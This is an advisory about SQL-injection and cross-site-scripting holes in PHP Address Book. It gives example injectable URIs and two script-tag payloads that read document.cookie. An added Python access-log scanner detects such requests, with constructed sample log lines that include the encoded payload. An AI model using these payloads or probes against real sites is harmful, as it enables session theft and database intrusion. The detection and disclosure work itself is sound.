PHP Address Book Multiple SQL Injection and Multiple Cross Site Scripting Vulnerabilities

The SQL-injection issues can be exploited directly from a browser. Exploiting a cross-site scripting issue requires tricking a victim into following a malicious URI.

The following example URIs demonstrate the issues (placeholders in brackets mark the injectable parameter):

http://www.example.com/addressbook/edit.php?id=[sql-injection]
http://www.example.com/addressbook/group.php?add=Add to&group=1&selected%5b%5d=132&to_group=[sql-injection]
http://www.example.com/addressbook/vcard.php?id=[sql-injection]

http://www.example.com/addressbook/preferences.php?from='"</script><script>alert(document.cookie)</script>
http://www.example.com/addressbook/index.php?group='"</script><script>alert(document.cookie)</script>
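As an added example that is not part of the advisory, the following Python scan flags requests to the endpoints and parameters listed above in Common Log Format access logs. It assumes that the `id`-style parameters are only ever legitimately integers (an assumption about the application, not something the advisory states) and that the `from`/`group` values are reflected into HTML, so a `script` tag in them is the signal to look for.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoints and parameters named in the advisory: id-style parameters should
# carry a bare integer; the other two are reflected into the page's HTML.
SQLI_PARAMS = {"/addressbook/edit.php": {"id"}, "/addressbook/vcard.php": {"id"},
               "/addressbook/group.php": {"to_group"}}
XSS_PARAMS = {"/addressbook/preferences.php": {"from"}, "/addressbook/index.php": {"group"}}
SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)
# Common Log Format: client ident user [time] "METHOD URI PROTO" status size
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) \S+" \d{3}')

def classify_request(uri):
    """Return (kind, path, param, decoded_value) tuples for one request URI."""
    parts = urlsplit(uri)
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    for name in SQLI_PARAMS.get(parts.path, ()):
        for value in query.get(name, []):
            if not value.isdigit():  # anything but a plain row id is suspicious here
                findings.append(("sqli", parts.path, name, value))
    for name in XSS_PARAMS.get(parts.path, ()):
        for value in query.get(name, []):
            if SCRIPT_TAG.search(value):
                findings.append(("xss", parts.path, name, value))
    return findings

def scan_log(lines):
    """Run classify_request over every parsable access-log line."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            for kind, path, param, value in classify_request(m.group("uri")):
                hits.append({"ip": m.group("ip"), "kind": kind, "path": path,
                             "param": param, "value": value})
    return hits

# Constructed sample log lines (not real traffic); clients are documentation IPs.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2010:12:00:01 +0000] "GET /addressbook/edit.php?id=42 HTTP/1.1" 200 1532',
    '203.0.113.5 - - [10/Mar/2010:12:00:02 +0000] "GET /addressbook/edit.php?id=42%27 HTTP/1.1" 500 512',
    '198.51.100.7 - - [10/Mar/2010:12:00:03 +0000] "GET /addressbook/group.php?add=Add+to&group=1&selected%5b%5d=132&to_group=1%27 HTTP/1.1" 200 900',
    '198.51.100.7 - - [10/Mar/2010:12:00:04 +0000] "GET /addressbook/preferences.php?from=%27%22%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 2048',
    '198.51.100.7 - - [10/Mar/2010:12:00:05 +0000] "GET /addressbook/index.php?group=friends HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Only the second, third and fourth sample lines produce findings; the legitimate integer id and the plain group name pass without a hit.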

Copyright 2010, SecurityFocus